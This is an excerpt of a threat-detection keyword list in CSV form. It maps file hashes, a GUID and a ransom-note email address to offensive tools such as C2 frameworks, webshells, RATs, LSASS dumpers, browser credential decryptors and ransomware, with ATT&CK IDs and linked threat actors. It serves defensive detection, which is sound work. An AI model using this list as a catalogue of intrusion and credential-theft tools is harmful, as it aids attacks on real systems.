"*896b78750aa60555dd7ade5976010943ee946359b51cf2b4b2314e4613d617ac*",".{0,1000}896b78750aa60555dd7ade5976010943ee946359b51cf2b4b2314e4613d617ac.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30530"
"*896b8d804debd233200375a5b7c1218d5b8bf5f53aaaa685b9d411c0770e27d4*",".{0,1000}896b8d804debd233200375a5b7c1218d5b8bf5f53aaaa685b9d411c0770e27d4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30531"
"*896f5c5de9ee24be5ff08ee6b543a15752c57c43efefad3be85451db9c560576*",".{0,1000}896f5c5de9ee24be5ff08ee6b543a15752c57c43efefad3be85451db9c560576.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","30532"
"*897243728161@thesecure.biz*",".{0,1000}897243728161\@thesecure\.biz.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","30533"
"*89781c80b442ef36a857bdf403b7ecf12e9876a059ec81ebae250f387afbec63*",".{0,1000}89781c80b442ef36a857bdf403b7ecf12e9876a059ec81ebae250f387afbec63.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","30534"
"*89789cc0ae92f6b6cc77463942253e26ce68539db7d029c63c46f16f9ee2b489*",".{0,1000}89789cc0ae92f6b6cc77463942253e26ce68539db7d029c63c46f16f9ee2b489.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30535"
"*89873326f393acc1d9c4ff7d897f60db68075d418a034c377a2d72cd1a09c95b*",".{0,1000}89873326f393acc1d9c4ff7d897f60db68075d418a034c377a2d72cd1a09c95b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30537"
"*899f9cdb99255c88ba4af54556c52f24d5ef0c6911663efef02ddd15f0934409*",".{0,1000}899f9cdb99255c88ba4af54556c52f24d5ef0c6911663efef02ddd15f0934409.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30540"
"*89a0c5bfa07f8c0114208173eb77b9a49a43cee5694c5111dd178ea0b51c51f0*",".{0,1000}89a0c5bfa07f8c0114208173eb77b9a49a43cee5694c5111dd178ea0b51c51f0.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","30541"
"*89a674622f27cf3b03f04ee2da6bba953ea1843d0d1ffe4f62881f4ab4741caf*",".{0,1000}89a674622f27cf3b03f04ee2da6bba953ea1843d0d1ffe4f62881f4ab4741caf.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","30543"
"*89a687f0367983c98008e9bd2d82e6aa579e24f2d702b6912eeae74b21e85dc9*",".{0,1000}89a687f0367983c98008e9bd2d82e6aa579e24f2d702b6912eeae74b21e85dc9.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","30544"
"*89b8e0c1afe4680c8f02e517467a71a4a2559f41792565bd646f0127642782a1*",".{0,1000}89b8e0c1afe4680c8f02e517467a71a4a2559f41792565bd646f0127642782a1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30547"
"*89bdca2cd5edd0c7e5b3f99ff817f8df7ab449c188dad0f5eae526600df80656*",".{0,1000}89bdca2cd5edd0c7e5b3f99ff817f8df7ab449c188dad0f5eae526600df80656.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30550"
"*89bfa445e98341969422b43a84c9751b15eb7db2b10e2be755629d04b4cd2a31*",".{0,1000}89bfa445e98341969422b43a84c9751b15eb7db2b10e2be755629d04b4cd2a31.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","30551"
"*89c2214589dff9530c6367d2968ba26cd9533eb279b88dc755b06d66ed575428*",".{0,1000}89c2214589dff9530c6367d2968ba26cd9533eb279b88dc755b06d66ed575428.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#filehash","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","30553"
"*89cb2fcaf93e959f54a336545ba2935749e33c624c0bd08a8ebfff72aea8d627*",".{0,1000}89cb2fcaf93e959f54a336545ba2935749e33c624c0bd08a8ebfff72aea8d627.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30554"
"*89ce01a4f096106970ed68939f64e6ff319ce9b8a07c3cef1db0e88029ba2466*",".{0,1000}89ce01a4f096106970ed68939f64e6ff319ce9b8a07c3cef1db0e88029ba2466.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","30555"
"*89d37b998b4dde0492d237508a2521a79768d284f8d184a017fcbe444393307c*",".{0,1000}89d37b998b4dde0492d237508a2521a79768d284f8d184a017fcbe444393307c.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","30556"
"*89d3c1ac21486c9deb1a08ac10cc6b722a19801163dad4d8b57c1aa8a18f32b8*",".{0,1000}89d3c1ac21486c9deb1a08ac10cc6b722a19801163dad4d8b57c1aa8a18f32b8.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","30557"
"*89d3f128432dd85a62c1f1c394dc8a0397ba23c5a193449dabcae0d1f84d3b18*",".{0,1000}89d3f128432dd85a62c1f1c394dc8a0397ba23c5a193449dabcae0d1f84d3b18.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30558"
"*89d678050ee670535a84b9e38557f626b1c704a9998e528a58e7cee830378283*",".{0,1000}89d678050ee670535a84b9e38557f626b1c704a9998e528a58e7cee830378283.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","30559"
"*89dd31e34f17eb509798b7d6fb51df74d38cb3e31c0f6422a934bc8b92f185ba*",".{0,1000}89dd31e34f17eb509798b7d6fb51df74d38cb3e31c0f6422a934bc8b92f185ba.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30560"
"*89e27312c55e98af1c2f4882a53b08abc4a54fc8d6c09959447f2444b3ccece1*",".{0,1000}89e27312c55e98af1c2f4882a53b08abc4a54fc8d6c09959447f2444b3ccece1.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30562"
"*89e5abaa609aee8b15058958c28b4821708fffb607202669ef33803cb2a80104*",".{0,1000}89e5abaa609aee8b15058958c28b4821708fffb607202669ef33803cb2a80104.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30564"
"*89eab8092b36ec3ea05291a614742f9f926685f89c2b25fd5804974292255b3b*",".{0,1000}89eab8092b36ec3ea05291a614742f9f926685f89c2b25fd5804974292255b3b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30565"
"*89ec75e91e04d7e807868b19dbf8adfe109d62762b4c2afc0e4ee6fd37ef7df7*",".{0,1000}89ec75e91e04d7e807868b19dbf8adfe109d62762b4c2afc0e4ee6fd37ef7df7.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30566"
"*89f57029ae1ecd8d584040360ea4450d4bbd20e1339fd6c1c2ce6faaf7a1e8a9*",".{0,1000}89f57029ae1ecd8d584040360ea4450d4bbd20e1339fd6c1c2ce6faaf7a1e8a9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30567"
"*89fa21c871572c227274d7836c88e815b748db63f6a662553a43cc1dd086667c*",".{0,1000}89fa21c871572c227274d7836c88e815b748db63f6a662553a43cc1dd086667c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30568"
"*89fb18f0ffce36584def6266ae92f8b5273f2d89de96772625845f77c64ef0dc*",".{0,1000}89fb18f0ffce36584def6266ae92f8b5273f2d89de96772625845f77c64ef0dc.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","30569"
"*89fb415ca8b0055c8d4af09cf603469e36cb256899d7e0eca024e3f555f5513b*",".{0,1000}89fb415ca8b0055c8d4af09cf603469e36cb256899d7e0eca024e3f555f5513b.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","30570"
"*8a01a909a9fbaeb9d1061774811d0d2b165ff7dd199fea5543a75773bd5b13a7*",".{0,1000}8a01a909a9fbaeb9d1061774811d0d2b165ff7dd199fea5543a75773bd5b13a7.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","30572"
"*8a03202d0bdc6af38995b2b3d19f83075d390b85cd38df6cbc2d6093a3c14125*",".{0,1000}8a03202d0bdc6af38995b2b3d19f83075d390b85cd38df6cbc2d6093a3c14125.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30573"
"*8a0f503edc5f450e94323d0d1cc10fb2f199f6bafdad02f382c46f5b501c98fb*",".{0,1000}8a0f503edc5f450e94323d0d1cc10fb2f199f6bafdad02f382c46f5b501c98fb.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","30575"
"*8a131449c4f5bffc5ae0cda597df9d17a3dff1d02422c890622c0359ee0a03f1*",".{0,1000}8a131449c4f5bffc5ae0cda597df9d17a3dff1d02422c890622c0359ee0a03f1.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","30576"
"*8a14ac67d5d8ec601c353b0d7faebd6753e34f283797e201544ee5ef32317e91*",".{0,1000}8a14ac67d5d8ec601c353b0d7faebd6753e34f283797e201544ee5ef32317e91.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30577"
"*8A15D28C-252A-4FCC-8BBD-BC3802C0320A*",".{0,1000}8A15D28C\-252A\-4FCC\-8BBD\-BC3802C0320A.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","30578"
"*8a15e1d1589aeac183ce00830f32e9399f88f1db811f00e537a5fac1ac8002a0*",".{0,1000}8a15e1d1589aeac183ce00830f32e9399f88f1db811f00e537a5fac1ac8002a0.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","30579"
"*8a1699ce5630406091ec92ceec25f46a587888d228f3a9322dbaf9857cb3b5b7*",".{0,1000}8a1699ce5630406091ec92ceec25f46a587888d228f3a9322dbaf9857cb3b5b7.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","30580"
"*8a22596f3783d65822de3eee7a72899699d1fffb885404ddf9c1cb0b8b780442*",".{0,1000}8a22596f3783d65822de3eee7a72899699d1fffb885404ddf9c1cb0b8b780442.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","30585"
"*8a24643b1ae79babbba0995d870bf0992cfc9acfef6459727c603ef5b61c261f*",".{0,1000}8a24643b1ae79babbba0995d870bf0992cfc9acfef6459727c603ef5b61c261f.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","30586"
"*8a274c53950fe680f5b5eb76594aa0b30facdf93187277d03653334a5224f6a0*",".{0,1000}8a274c53950fe680f5b5eb76594aa0b30facdf93187277d03653334a5224f6a0.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30587"
"*8a2d02874922312a9e7f9bceabd0aca41246bc3bd0a172d149ad357c46d297ac*",".{0,1000}8a2d02874922312a9e7f9bceabd0aca41246bc3bd0a172d149ad357c46d297ac.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30588"
"*8a2f2dcdf0a2f4b3bf2c7ac94205e769dfcdb7c161df5a8d9df52935dbaeb936*",".{0,1000}8a2f2dcdf0a2f4b3bf2c7ac94205e769dfcdb7c161df5a8d9df52935dbaeb936.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","#filehash","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","30591"
"*8a30a6a44efd71aa9a771f4d9864be4c3c9d8074adc828018ce774764e8036a9*",".{0,1000}8a30a6a44efd71aa9a771f4d9864be4c3c9d8074adc828018ce774764e8036a9.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30593"
"*8a30ec054667ecd1bd27a853f9cfc161e6e5d7012a5ab62adf199fa87badc502*",".{0,1000}8a30ec054667ecd1bd27a853f9cfc161e6e5d7012a5ab62adf199fa87badc502.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30594"
"*8a3bfd492f149d5c83675dd30e6ad94160534c980665609d6142f246552ac684*",".{0,1000}8a3bfd492f149d5c83675dd30e6ad94160534c980665609d6142f246552ac684.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","30596"
"*8a3d9dde4d2e42261f08cd41acec9917920b1b926471825e0c10751c14a53cad*",".{0,1000}8a3d9dde4d2e42261f08cd41acec9917920b1b926471825e0c10751c14a53cad.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","30597"
"*8a417e475065810997e9920df3b411696a4d494abb4204921fd6cb54ff455daa*",".{0,1000}8a417e475065810997e9920df3b411696a4d494abb4204921fd6cb54ff455daa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30599"
"*8a496c84ce56714227135340a42fb720d04f4f9038e46b1e525e6fbdc87434e8*",".{0,1000}8a496c84ce56714227135340a42fb720d04f4f9038e46b1e525e6fbdc87434e8.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","30600"
"*8a4fcb53f64c79e74399d228582e80979dc95eafe52ac7708bd353284fd8f35b*",".{0,1000}8a4fcb53f64c79e74399d228582e80979dc95eafe52ac7708bd353284fd8f35b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30601"
